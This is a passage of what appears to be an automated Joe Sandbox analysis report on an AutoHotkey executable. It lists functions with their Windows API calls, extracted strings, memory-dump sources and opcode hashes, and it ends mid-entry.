                                      • Instruction ID: c3236d36069c15bf255d8f55c4635ef5e0cc49e1d6ec847ebbaf4688681b57ac
                                      • Opcode Fuzzy Hash: 8545957c2536aa354c25947f10f36821f35fdc7a26605fe58a8b6d0b53404981
                                      • Instruction Fuzzy Hash: 4F71B471F442097BDB20DBA48C86FBF73689F45B11F10461ABE14AB2C1DBB8AD05875D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00414510 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 239COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: 988ffa64b856b7e4df0d0abba3c9521e3e5a57e697933b19cb8b34d638dc1b2d
                                      • Instruction ID: f9a3469c407ff64a3f2716cfff3a29ba68359cc7bcd3ccceb251460952475391
                                      • Opcode Fuzzy Hash: 988ffa64b856b7e4df0d0abba3c9521e3e5a57e697933b19cb8b34d638dc1b2d
                                      • Instruction Fuzzy Hash: 3091E3306193809ED711DF24D850BA6BFE1EF86350F49817FE5848B3A2DB788848DB5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00412000 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 235COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0047FFB0: _vswprintf_s.LIBCMT ref: 0047FFC9
                                      • __itow.LIBCMT ref: 0041208B
                                      • __swprintf.LIBCMT ref: 004121FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __itow__swprintf_vswprintf_s
                                      • String ID: %i-%i$%s%s%s%s%s%s$(no)$OFF$PART$TypeOff?LevelRunningName-------------------------------------------------------------------
                                      • API String ID: 726126973-1635122839
                                      • Opcode ID: decf72f1a5f004fbc94b7610e5c4b5b6f4ad4cf187a60a483437537c0d362a26
                                      • Instruction ID: e192f332c92596dfcebd7c2db3f6f7e976affffdd68e73fb01a7b6457a9322e9
                                      • Opcode Fuzzy Hash: decf72f1a5f004fbc94b7610e5c4b5b6f4ad4cf187a60a483437537c0d362a26
                                      • Instruction Fuzzy Hash: 42811431208341AADB24DF25CA40BB777E0AF89304F14496FE98AC7351E7BCD9A5C35A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043F3B0 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 167COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: EndKey$EndKey:$Match$Max$NewInput$Stopped$Timeout$sc%03X
                                      • API String ID: 0-3482771585
                                      • Opcode ID: 8c59cb50e2edd92ab8d2f82dbb654abfe8fbb5c9fa71daab41c26d3b179181d4
                                      • Instruction ID: 30819489645a39f5ca8486b46b9b4c4e20cb2169673f3609196ace4d8fd2aad9
                                      • Opcode Fuzzy Hash: 8c59cb50e2edd92ab8d2f82dbb654abfe8fbb5c9fa71daab41c26d3b179181d4
                                      • Instruction Fuzzy Hash: 71518F72B0425066D7308B2DA8017F7B7A0DFD9315F04843FE58586382E66EA99DC77E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00475140 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 156COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _wcschr$CharKeyboardLayoutLower__wcsnicmp
                                      • String ID: Alt$Ctrl$Shift
                                      • API String ID: 1244995357-3426316353
                                      • Opcode ID: b5a9b7bda12d872fd194647517356463686ba369b6cb745242fed19be2bbe0bd
                                      • Instruction ID: 033e89f8a70af2edb5ec74b45c500071ce13adcd8f067c91c9c70a60226b8c40
                                      • Opcode Fuzzy Hash: b5a9b7bda12d872fd194647517356463686ba369b6cb745242fed19be2bbe0bd
                                      • Instruction Fuzzy Hash: 2C41482294471056DB345B548802BE7BBE4DF51312F18C85BF8889F2C2F3EC9988D7EA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004046C0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 123sleepwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindWindowW.USER32(AutoHotkey,02C4017C), ref: 0040473A
                                      • FindWindowW.USER32(AutoHotkey,02C4017C), ref: 0040479C
                                      • PostMessageW.USER32(00000000,00000044,00000406,00000000), ref: 004047AF
                                      • Sleep.KERNEL32(00000014,?,?,?,?,?,00404346), ref: 004047BF
                                      • IsWindow.USER32(00000000), ref: 004047C8
                                      • Sleep.KERNEL32(00000014,?,?,?,?,?,00404346), ref: 004047FA
                                      • IsWindow.USER32(00000000), ref: 004047FD
                                      • Sleep.KERNEL32(00000064,?,?,?,?,?,00404346), ref: 00404805
                                      Strings
                                      • An older instance of this script is already running. Replace it with this instance?Note: To avoid this message, see #SingleInsta, xrefs: 0040476F
                                      • AutoHotkey, xrefs: 00404735, 00404797
                                      • Could not close the previous instance of this script. Keep waiting?, xrefs: 004047E3
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$Sleep$Find$MessagePost
                                      • String ID: An older instance of this script is already running. Replace it with this instance?Note: To avoid this message, see #SingleInsta$AutoHotkey$Could not close the previous instance of this script. Keep waiting?
                                      • API String ID: 1104075879-579680267
                                      • Opcode ID: f119834dc0c98846b0b8871a56cee225f2a22efa849bba68ae9893dc82d13b16
                                      • Instruction ID: 92fb2ce671a2138742f7eff805c54740d54856b0f0f5962dee0aef5a07e5abb1
                                      • Opcode Fuzzy Hash: f119834dc0c98846b0b8871a56cee225f2a22efa849bba68ae9893dc82d13b16
                                      • Instruction Fuzzy Hash: 8031D2B2B422059AE7307358EC45B2A3794DBC3728F160037E701E72E0C7B89C4183AD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045D019 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004142C0: __fassign.LIBCMT ref: 004142D0
                                      • GetClassNameW.USER32(?,?,00000020), ref: 0045D043
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0045D095
                                      • SendMessageTimeoutW.USER32(?,-00000186,-00000001,00000000,00000002,000007D0,?), ref: 0045D11E
                                      • GetParent.USER32 ref: 0045D134
                                      • SetLastError.KERNEL32(00000000,?,?,-00000186,-00000001,00000000,00000002,000007D0,?), ref: 0045D146
                                      • GetDlgCtrlID.USER32 ref: 0045D14D
                                      • GetLastError.KERNEL32(?,?,?,-00000186,-00000001,00000000,00000002,000007D0,?), ref: 0045D159
                                      • SendMessageTimeoutW.USER32(00000000,00000111,?,?,00000002,000007D0,000000FF), ref: 0045D186
                                      • SendMessageTimeoutW.USER32(00000000,00000111,00000002,?,00000002,000007D0,000000FF), ref: 0045D1AE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSendTimeout$ErrorLast$ClassCtrlLongNameParentWindow__fassign
                                      • String ID: Combo$List
                                      • API String ID: 2104288607-1246219895
                                      • Opcode ID: 99f8e3ba44cc00bfc8254b6a9d8757a639de66430857f4d61280d14a8e99a449
                                      • Instruction ID: 64f394173fa6ce294eadd19af5878517337a2685a3f9cd86112ab4450a6cda27
                                      • Opcode Fuzzy Hash: 99f8e3ba44cc00bfc8254b6a9d8757a639de66430857f4d61280d14a8e99a449
                                      • Instruction Fuzzy Hash: BF31D970F443056AE7309F609C86F7B76A8DF85B11F00062BBE15EA1D2DAACDC498769
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0047C620 Relevance: 18.3, APIs: 12, Instructions: 325registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000000,?), ref: 0047C68C
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000000,?,?,00000000,00000000,?), ref: 0047C6AF
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: OpenQueryValue
                                      • String ID:
                                      • API String ID: 4153817207-0
                                      • Opcode ID: ac7b69f31564c49ae3066a85039faa26c1027097124247fa0cc8fa72d22ba07a
                                      • Instruction ID: 10f8cc8de5ea8d871d1a7c63fee194d31aec333fd32772b961b744fa9cc65141
                                      • Opcode Fuzzy Hash: ac7b69f31564c49ae3066a85039faa26c1027097124247fa0cc8fa72d22ba07a
                                      • Instruction Fuzzy Hash: F7B1B3B12043029BD724DF69D8C5EBBB3E8EB98704F00892EF549D7250DB74DD458B6A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00438630 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 265COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _wcschr$_malloc_memmove_wcsncpy
                                      • String ID: "$Out of memory.
                                      • API String ID: 278627150-1555670740
                                      • Opcode ID: 2a7be64baea612efc5026e0370838be237df44805ad369801105621e1c2273f9
                                      • Instruction ID: 29e8954e17d0373225af1b5c4e4cd10c76706f45c0aed13724dcdbe78cd93573
                                      • Opcode Fuzzy Hash: 2a7be64baea612efc5026e0370838be237df44805ad369801105621e1c2273f9
                                      • Instruction Fuzzy Hash: BE91B1B1E002159BDF24EF54CC81AAFB7B4EF48314F15406EE905A7341EB789E45CBAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00469329 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 218COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Close$ContextMenu$DropFiles$Escape$Size
                                      • API String ID: 3832890014-3360012346
                                      • Opcode ID: bc50ccfc5e7fcf58a729ebb25d51cdc8ab5dfd9e566fd3f47c6dbd56c2ba6f05
                                      • Instruction ID: c5455d538713f770327abc346c9d9bf2a077c7085266911add73bc7505164ff6
                                      • Opcode Fuzzy Hash: bc50ccfc5e7fcf58a729ebb25d51cdc8ab5dfd9e566fd3f47c6dbd56c2ba6f05
                                      • Instruction Fuzzy Hash: EB71A332A04315ABCB309A25890176773A8EF84B54F09886FEC469B350F7B8DC45C7AB
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0046A31D Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 177COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(?), ref: 0046A341
                                      • SelectObject.GDI32(00000000,?), ref: 0046A365
                                      • GetTextMetricsW.GDI32(00000000,?), ref: 0046A378
                                      • GetSystemMetrics.USER32(00000002), ref: 0046A398
                                      • GetDC.USER32(?), ref: 0046A3F6
                                      • SelectObject.GDI32(00000000,?), ref: 0046A419
                                      • GetSystemMetrics.USER32(00000005), ref: 0046A493
                                      • GetSystemMetrics.USER32(00000006), ref: 0046A49F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Metrics$System$ObjectSelect$Text
                                      • String ID: @$@,
                                      • API String ID: 3198775916-1203063547
                                      • Opcode ID: 852901c86cf68278bcf9f054401ac65db5713a98731305d162a4dd4ab5285344
                                      • Instruction ID: 3318a6a2c9b316b1f856e4670a85651de54aec165521894726323a207b7af0bc
                                      • Opcode Fuzzy Hash: 852901c86cf68278bcf9f054401ac65db5713a98731305d162a4dd4ab5285344
                                      • Instruction Fuzzy Hash: A961D3719087418FC324DF28C84976BBBE1BF85304F18491EE98A97391E7B89851CF8B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041B740 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 58COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Monitor$MonitorCount$MonitorName$MonitorPrimary$MonitorWorkArea
                                      • API String ID: 3832890014-629551668
                                      • Opcode ID: 80f7093c841948a1b175d9a642bdd45193ae37816271e6a79ac371f81aac3973
                                      • Instruction ID: d5e1272c07fe3006b95e2f1af2b4ec9e6785130d25038b1e73d7a272ad97ed6d
                                      • Opcode Fuzzy Hash: 80f7093c841948a1b175d9a642bdd45193ae37816271e6a79ac371f81aac3973
                                      • Instruction Fuzzy Hash: F1016259B41A1132EE3521395D03BDA60858B90B0BF94497AB914D93C5F78DDA44C0ED
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041C3E0 Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 47COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Close$Exist$Priority$Wait$WaitClose
                                      • API String ID: 3832890014-1466124334
                                      • Opcode ID: 5c55dd9977b78e2a9ca51e9936c1f026fe200048652b979544d6d84ad93d0ee1
                                      • Instruction ID: 4de72bd59183f8f51b2dc933a3d72cc3654f8bc448ef428bc7e8ad7932b6eedc
                                      • Opcode Fuzzy Hash: 5c55dd9977b78e2a9ca51e9936c1f026fe200048652b979544d6d84ad93d0ee1
                                      • Instruction Fuzzy Hash: 21F09065A85A2121DF25252D5D53BEB20845B60F0BFD4457BF800D12C1F38EDE81C1BE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041D1A0 Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 44COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Caret$Menu$Mouse$Pixel$ToolTip
                                      • API String ID: 3832890014-3728172800
                                      • Opcode ID: fd6c63114c51b9ba34f944b147c4eb871e2159a8f250615d54ea9b34ce018740
                                      • Instruction ID: a15dd1b9b9830ed505e8634de6e726437304dea02b7d94128b73395eabfc1785
                                      • Opcode Fuzzy Hash: fd6c63114c51b9ba34f944b147c4eb871e2159a8f250615d54ea9b34ce018740
                                      • Instruction Fuzzy Hash: A9F017A9E4161122EE2A211D5E02BEB64885F21747F94447FBC0096281F79EDA85D1AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041B1A0 Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 41COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_SZ
                                      • API String ID: 3832890014-2346799943
                                      • Opcode ID: 3e78642d8acf8ce7ecb664dbd9fabd0c13d4669dbd5056657034086c5d576348
                                      • Instruction ID: d3946fa960ef78e0a204cdde2f62aa48fef47191b1b8e175ac83ded8a15a87d6
                                      • Opcode Fuzzy Hash: 3e78642d8acf8ce7ecb664dbd9fabd0c13d4669dbd5056657034086c5d576348
                                      • Instruction Fuzzy Hash: 2CF01C59A81A1632DE0920395E03BCF64849B61B8BFD405BAFC14D43C2F78ECA54C1FE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00477420 Relevance: 16.6, APIs: 11, Instructions: 146windowthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CheckMenuItem.USER32(00000000,0000FF19,?), ref: 0047747B
                                      • CheckMenuItem.USER32(00000000,0000FF1A,00000100), ref: 0047749B
                                      • GetCursorPos.USER32(?), ref: 004774B6
                                      • GetForegroundWindow.USER32(?,?,?,?,00445693,80000000,80000000), ref: 00477502
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00477517
                                      • SetForegroundWindow.USER32(0002044A), ref: 00477532
                                      • SetForegroundWindow.USER32(0002044A), ref: 00477559
                                      • TrackPopupMenuEx.USER32(00000000,00000000,?,?,0002044A,00000000,?,?,?,?,00445693,80000000,80000000), ref: 0047757E
                                      • PostMessageW.USER32(0002044A,00000000,00000000,00000000), ref: 004775A3
                                      • GetForegroundWindow.USER32(?,?,?,?,00445693,80000000,80000000), ref: 004775B3
                                      • SetForegroundWindow.USER32(00000000), ref: 004775C2
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$Foreground$Menu$CheckItem$CursorMessagePopupPostProcessThreadTrack
                                      • String ID:
                                      • API String ID: 4142709844-0
                                      • Opcode ID: eed962cdb18f4441f7bd4cdedc245371aa97d258b845f29a16dccfa3a829c648
                                      • Instruction ID: 6691b06162de7a46d904467c113024ea020879c3dbdafd7ecec9b02f6626c8a0
                                      • Opcode Fuzzy Hash: eed962cdb18f4441f7bd4cdedc245371aa97d258b845f29a16dccfa3a829c648
                                      • Instruction Fuzzy Hash: 50511671654301ABD720EF24EC81BBA7BA0AB45704F44863BF949A7791D378AC448BED
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00448530 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 260COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _wcsrchr$_wcschr
                                      • String ID: ://
                                      • API String ID: 2648016162-1869659232
                                      • Opcode ID: a80b8a16876ac66192cf3dac2d8b96d2bb992ab6ce74570da517a0fc32917bef
                                      • Instruction ID: 9f645e654967765eab9fb2194b5fcc88fce73a06e7c26e8e491f25b2c9cb55df
